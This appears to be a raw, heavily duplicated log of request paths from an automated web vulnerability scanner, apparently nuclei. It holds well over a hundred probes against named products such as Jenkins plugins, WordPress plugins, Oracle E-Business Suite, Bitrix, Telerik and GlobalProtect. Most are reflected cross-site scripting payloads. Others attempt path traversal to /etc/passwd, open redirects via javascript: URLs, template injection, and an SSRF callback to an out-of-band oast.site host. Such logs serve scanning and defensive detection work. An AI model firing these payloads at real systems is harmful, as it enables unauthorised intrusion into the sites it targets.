/web/topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E
/web/assets/_core/php/profile.php
/web/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa
/web/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1
/web/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("25SoNgi58i4LtJu3ii0PEe0dQk1")>
/web/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//
/web/assets/php/profile.php
/web/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E
/web/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm
/web/cas/v1/tickets/
/web/web/v1/kv/25SoNn9yVq5AS9HhA9Fjbm2cSuj
/web/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E
/web/vendor/qcubed/qcubed/assets/php/profile.php
/web/topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E
/web/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("25SoNgi58i4LtJu3ii0PEe0dQk1")>
/web/www/delivery/afr.php?refresh=10000&")',10000000);alert(1337);setTimeout('alert("
/web/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm
/web/cas/v1/tickets/
/web/web/v1/kv/25SoNn9yVq5AS9HhA9Fjbm2cSuj
/web/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E
/web/vendor/qcubed/qcubed/assets/php/profile.php
/web/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B
/web/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E
/web/web/v1/kv/25SoNn9yVq5AS9HhA9Fjbm2cSuj?raw
/web/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E
/web/
/web/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(xss)%3E
/web/http_header.php
/web/(download)/tmp/poc.txt
/web/wp-admin/admin-ajax.php
/web/wp-admin/admin.php
/web/www/delivery/afr.php?refresh=10000&")',10000000);alert(1337);setTimeout('alert("
/web/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22
/web/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x
/web/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+
/web/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e
/web/api/snapshots
/web/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E
/web/web/v1/kv/25SoNn9yVq5AS9HhA9Fjbm2cSuj?raw
/web/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E
/web
/web/http_header.php
/web/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search
/web/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E
/web/wp-content/plugins/insert-php/readme.txt
/web/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22
/web/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E
/web/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x
/web/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e
/web/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E
/web/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search
/web/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E
/web/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F
/web
/web/login.php/'%3E%3Csvg/onload=alert%6025SoNhBe3lGs0mBPoABcGMH4JiI%60%3E
/web/search
/web/help/english/index.html?javascript&
/web/?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E
/web/index.php?v=d&p=%22;alert(document.domain);%22
/web/mod/lti/auth.php?redirect_uri=javascript:alert('25SoNnCTRCSUFfw50872lFGmJpH')
/web/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/
/web/thruk/cgi-bin/login.cgi
/web/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22
/web/?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E
/web/gsearch.php.en?prod=';prompt`document.domain`;//
/web/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E
/web/wp-admin/options-general.php?page=yuzo-related-post
/web/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)
/web/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/25SoNe8ntZimnHQGTXDaqhyk3dl/)%3B%2F%2F
/web/
/web/error3?msg=30&data=';alert('nuclei');//
/web/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F
/web
/web/?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22
/web/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS
/web/login.php/'%3E%3Csvg/onload=alert%6025SoNhBe3lGs0mBPoABcGMH4JiI%60%3E
/web/search
/web/help/english/index.html?javascript&
/web/query/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/all
/web/auth/realms/master/clients-registrations/openid-connect
/web/Login?!'><sVg/OnLoAD=alert`1337`//
/web/index.php?v=d&p=%22;alert(document.domain);%22
/web/mod/lti/auth.php?redirect_uri=javascript:alert('25SoNnCTRCSUFfw50872lFGmJpH')
/web/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/
/web/thruk/cgi-bin/login.cgi
/web/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22
/web/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E
/web/kindeditor/php/demo.php
/web/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)
/web/global-protect/login.esp?user=j%22;-alert(1)-%22x
/web/wp-content/plugins/jh-404-logger/readme.txt
/web/error3?msg=30&data=';alert('nuclei');//
/web/php/demo.php
/web/omni_success?cmdb_edit_path=");alert('nuclei');//
/web/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password
/web/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a
/web/data/autosuggest-remote.php?q="><img%20src=x%20onerror=alert(1)>
/web/content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a
/web/admin/data/autosuggest-remote.php?q="><img%20src=x%20onerror=alert(1)>
/web/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f
/web/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS
/web/query/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/all
/web/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)
/web/wp-admin/admin-ajax.php?action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E
/web/php/demo.php
/web/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E
/web/wp-content/plugins/jh-404-logger/readme.txt
/web/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(xss)%3E
/web/global-protect/login.esp?user=j%22;-alert(1)-%22x
/web/omni_success?cmdb_edit_path=");alert('nuclei');//
/web/content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a
/web/+CSCOE+/saml/sp/acs?tgname=a
/web/autodiscover/autodiscover.json
/web/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password
/web/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E
/web/(download)/etc/passwd
/web/login/?uid="><img%20src="x"%20onerror="alert(%27XSS%27);">
/web/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f
/web/index.php?rest_route=/whm/v3/themesettings
/web/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22
/web/?mobile=1&mp_idx=%22;alert(%271%27);//
/web/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg
/web/te%3Cimg%20src=x%20onerror=alert(42)%3Est
/web/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E
/web/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13
/web/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)
/web/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('25SoNdb1aUbIJI6BVuSVEgXILKB')%3E
/web/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E
/web/cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1)
/web/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(xss)%3E
/web/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E
/web/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('25SoNdb1aUbIJI6BVuSVEgXILKB')%3E
/web/+CSCOE+/saml/sp/acs?tgname=a
/web/phpwiki/index.php/passwd
/web/autodiscover/autodiscover.json
/web/(download)/etc/passwd
/web/_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E
/web/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
/web/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E
/web/index.php?rest_route=/whm/v3/themesettings
/web/login/?uid="><img%20src="x"%20onerror="alert(%27XSS%27);">
/web/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22
/web/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E
/web/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6
/web/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E
/web/?{alert(1)}
/web/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E
/web/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('25SoNdb1aUbIJI6BVuSVEgXILKB')%3E
/web/cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1)
/web/phpwiki/index.php/passwd
/web/_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E
/web/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
/web/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E
/web/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)
/web/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E
/web/NateMail.php
/web/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('25SoNdb1aUbIJI6BVuSVEgXILKB')%3E
/web/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E
/web/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)
/web/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('25SoNdb1aUbIJI6BVuSVEgXILKB')%3E
/web/menu/stapp
/web/login
/web/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html
/web/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E
/web/index.php?action=login.index
/web/NateMail.php
/web/MUP/
/web/PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E
/web/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample
/web/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
/web/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E
/web/carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F
/web/?ajax-request=jnews
/web/timesheet/login.php
/web/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E
/web/menu/stapp
/web/login
/web/ghost/preview
/web/index.php?action=login.index
/web/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html
/web/api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html
/web/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x
/web/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9
/web/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>
/web/MUP/
/web/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://
/web/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
/web/PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E
/web/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample
/web/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22
/web/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('25SoNj6Ojf8gjSbvpzr1KSlrraA')%3elujb7/admin/imgProcess.cfm
/web/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample
/web/e/ViewImg/index.html?url=javascript:alert(document.domain)
/web/timesheet/login.php
/web/api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html
/web/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x
/web/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9
/web/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>
/web/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/25SoNad7u0RoiMhIt9wX48d7TQp/);marmoset.embed(%27a
/web/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22
/web/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('25SoNj6Ojf8gjSbvpzr1KSlrraA')%3elujb7/admin/imgProcess.cfm
/web/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E
/web/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample
/web/lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('25SoNj6Ojf8gjSbvpzr1KSlrraA')%3elujb7/admin/imgProcess.cfm
/web/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/25SoNad7u0RoiMhIt9wX48d7TQp/);marmoset.embed(%27a
/web/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E
/web/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://c8acln19m8v9ulcbrbhgcekcsxayyyyyr.oast.site
/web/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://c8acln19m8v9ulcbrbhgcekcsxayyyyyr.oast.site
